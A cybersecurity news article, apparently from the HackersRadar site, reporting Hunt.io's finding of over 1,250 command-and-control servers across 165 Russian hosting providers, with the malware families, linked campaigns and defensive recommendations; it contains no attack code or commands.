Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons

Social Media

Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons
Search the Site
Popular Searches:
technology Amazon AI
Recent Posts
India Halts WhatsApp Usernames Rollout Due to Fraud Concerns
July 1, 2026
Critical Cursor IDE RCE Vulnerabilities Allow Zero-Click Prompt Injection
July 1, 2026
Automated Password Spray Attacks Target Microsoft Azure CLI
July 1, 2026
Home/Threats/Russian C2 Servers Mapped Across 165 Hosting Providers
Threats

Russian C2 Servers Mapped Across 165 Hosting Providers

Key Takeaways Over 1,250 active command-and-control (C2) servers were identified within Russian hosting environments. These C2 servers are distributed across 165 different Russian hosting providers,...

Marcus Rodriguez
Marcus Rodriguez
April 16, 2026 4 Min Read
36 0

Key Takeaways

  • Over 1,250 active command-and-control (C2) servers were identified within Russian hosting environments.
  • These C2 servers are distributed across 165 different Russian hosting providers, including shared hosting, virtual servers, and telecommunication networks.
  • The infrastructure supports a wide range of malicious activities, from malware distribution and phishing to information stealing and botnet operations.
  • Key malware families leveraging this infrastructure include Keitaro, Hajime, Mozi, and Mirai, alongside offensive security frameworks like Cobalt Strike.
  • Multiple active campaigns, such as those distributing Latrodectus v2.3, Lumma Stealer, Remcos RAT, SHADOWSNIFF, SALATSTEALER, and BoryptGrab, are linked to this C2 network.

Cybersecurity experts have uncovered an extensive and organized network of malicious infrastructure operating largely undetected within Russia’s commercial hosting sector. This discovery highlights the deep entrenchment of cybercriminal operations within legitimate internet services.

Table Of Content

  • Key Takeaways
  • The Ubiquitous Threat of C2 Servers
  • Malware Families and Active Campaigns
  • What You Should Do

During a three-month analysis period, from January 1 to April 1, 2026, researchers documented over 1,250 active command-and-control (C2) servers. These servers were found distributed across 165 distinct Russian infrastructure providers, encompassing shared hosting, virtual private servers, and various telecommunications networks, as detailed in a comprehensive report by Hunt.io analysts.

The Ubiquitous Threat of C2 Servers

C2 servers are critical components in most cyberattacks, serving as the communication hub for threat actors to issue commands to compromised systems and exfiltrate stolen data. The sheer volume of over 1,250 active C2 servers simultaneously residing within Russian hosting providers underscores the scale at which malicious infrastructure has integrated into mainstream commercial networks.

Crucially, these servers are not confined to a few isolated internet corners. Their widespread distribution across 165 different providers complicates detection and blocking efforts, allowing attackers to maintain their operations with greater anonymity and resilience.

Hunt.io analysts and researchers identified these patterns through their Host Radar intelligence module. This tool specializes in correlating C2 servers, phishing infrastructure, open malicious directories, and public indicators of compromise (IoCs) back to their underlying hosting providers. This methodology offers crucial provider-level visibility, transforming ephemeral IP addresses into actionable intelligence by revealing systematic patterns in how malicious infrastructure is deployed and reused across Russian hosting environments.

Across the entire dataset, Host Radar identified approximately 1,290 malicious artifacts during the observation period. C2 infrastructure constituted the vast majority, accounting for roughly 88.6% of all detected activity with 1,252 confirmed servers. Other malicious elements included open directories (5.3%), phishing sites (4.9%), and publicly reported indicators of compromise (1.2%).

Several hosting providers emerged as significant hosts for this illicit activity. TimeWeb led the list with 311 detected C2 servers over the 90-day period. Following closely were WebHost1 with 140, REG.RU with 138, VDSina with 86, and PROSPERO OOO with 80.

Malware Families and Active Campaigns

Utilizing their HuntSQL analytics platform, researchers queried telemetry data across Russian networks to pinpoint the malware families most frequently associated with C2 infrastructure. The findings revealed a diverse ecosystem of threats.

Keitaro, a traffic distribution system often exploited to redirect users to malware, dominated the dataset with 587 unique C2 IP addresses, representing the largest concentration observed. IoT-focused botnets also featured prominently, with Hajime linked to 191 C2 servers, and both Mozi and Mirai demonstrating ongoing abuse of compromised routers and embedded devices.

Offensive security frameworks repurposed for malicious intent were also detected, including Tactical RMM (87 endpoints), various Cobalt Strike variants (a combined 55 instances), Sliver, and Ligolo-ng. Furthermore, scanning and phishing tools such as Acunetix, Interactsh, and Gophish were identified, confirming that this infrastructure supports reconnaissance and credential theft in addition to direct intrusions.

Top 10 Malware Command-and-Control (C2) Families (Source - Hunt.io)
Top 10 Malware Command-and-Control (C2) Families (Source – Hunt.io)

The gravity of these findings is underscored by active campaigns directly linked to this infrastructure. One notable campaign leveraging JSC TIMEWEB infrastructure employed a deceptive CAPTCHA technique called “ClickFix.” This method tricked users into executing a PowerShell command, leading to the download of Latrodectus v2.3 malware, which then communicated with attacker-controlled domains.

Infrastructure hosted by REG.RU was implicated in a Lumma Stealer operation. This campaign exploited Google Groups redirectors to distribute malicious archives targeting both Windows and Linux systems. On Hosting Technology LTD infrastructure, the SmartApeSG campaign deployed the Remcos RAT through fake CAPTCHA prompts on compromised websites, achieving persistence via DLL sideloading.

Beget LLC infrastructure was tied to the UAC-0252 campaign. This operation involved impersonating Ukrainian government institutions and deploying SHADOWSNIFF and SALATSTEALER infostealers by exploiting a WinRAR vulnerability, tracked as CVE-2025-8088.

Top ISPs hosting malware (Source - Hunt.io)
Top ISPs hosting malware (Source – Hunt.io)

Separately, Proton66 OOO infrastructure was connected to a BoryptGrab infostealer operation that abused over 100 public GitHub repositories through SEO manipulation tactics.

What You Should Do

  • Prioritize Provider-Level Monitoring: Treat monitoring hosting providers, especially those with high C2 activity like TimeWeb, REG.RU, WebHost1, VDSina, and PROSPERO OOO, as a core defensive priority.
  • Monitor Outbound Connections: Implement strict monitoring for outbound connections to Russian Autonomous System Numbers (ASNs) known to host C2 activity.
  • Enhance Threat Intelligence: Integrate threat intelligence that covers infrastructure-level indicators, beyond just traditional file hashes, to detect emerging threats more effectively.
  • Restrict PowerShell Chains: Implement controls to restrict or block ‘curl-to-PowerShell’ chains, which are frequently exploited by ClickFix-style lures and similar attack vectors.
  • Maintain IoT/Edge Device Visibility: Ensure comprehensive visibility and security measures for IoT and edge devices, given the persistent activity of botnets like Hajime, Mozi, and and Mirai.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.

Tags:

AttackCVECybersecurityMalwarephishingSecurityThreatVulnerability

Share Article

Marcus Rodriguez

Marcus Rodriguez

Marcus is a security researcher and investigative journalist with expertise in vulnerability research, bug bounties, and cloud security. Since 2017, Marcus has been breaking stories on critical vulnerabilities affecting major platforms. His investigative work has led to the disclosure of numerous security flaws and improved defenses across the industry. Marcus is an active participant in bug bounty programs and has been recognized for responsible disclosure practices. He holds multiple security certifications and regularly speaks at industry events.

Previous Post

Hackers use AI-generated content to push malicious notifications via Google Discover

Next Post

Fake Adobe Reader Installer Delivers ScreenConnect via In-Memory Loader

No Comment! Be the first one.

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Popular Posts
Critical Fluentd Vulnerabilities Allow Remote Code Execution
July 1, 2026
Weaponized Google Ads Install Malicious Claude Code to Hijack macOS
July 1, 2026
Critical Adobe ColdFusion Vulnerabilities Let Attackers Run Code
July 1, 2026
Top Authors
Marcus Rodriguez
Marcus Rodriguez
Jennifer sherman
Jennifer sherman
Emy Elsamnoudy
Emy Elsamnoudy
Let's Connect
156k
2.25m
285k

Related Posts

Jennifer sherman
By Jennifer sherman
Threats

GlassWorm Attacks macOS via Malicious VS Code…

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Attacks

ClickFix Attack Hides Malicious Code via Stegan Security

January 1, 2026
Sarah simpson
By Sarah simpson
Vulnerabilities

MongoBleed Detector Tool Released to Detect MongoDB Vulnerability(CVE-2025-14847)

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Breaches

Conti Ransomware Gang Leaders & Infrastructure Exposed

January 1, 2026
Hackers News Hackers News
  • [email protected]

Quick Links

  • Contact Us
  • Privacy Policy
  • Terms of service

Categories

Attacks
Breaches
Comparisons
CyberSecurity News
Threats
Vulnerabilities

Let's keep in touch

receive fresh updates and breaking cyber news every day and week!

All Rights Reserved by HackersRadar ©2026

Follow Us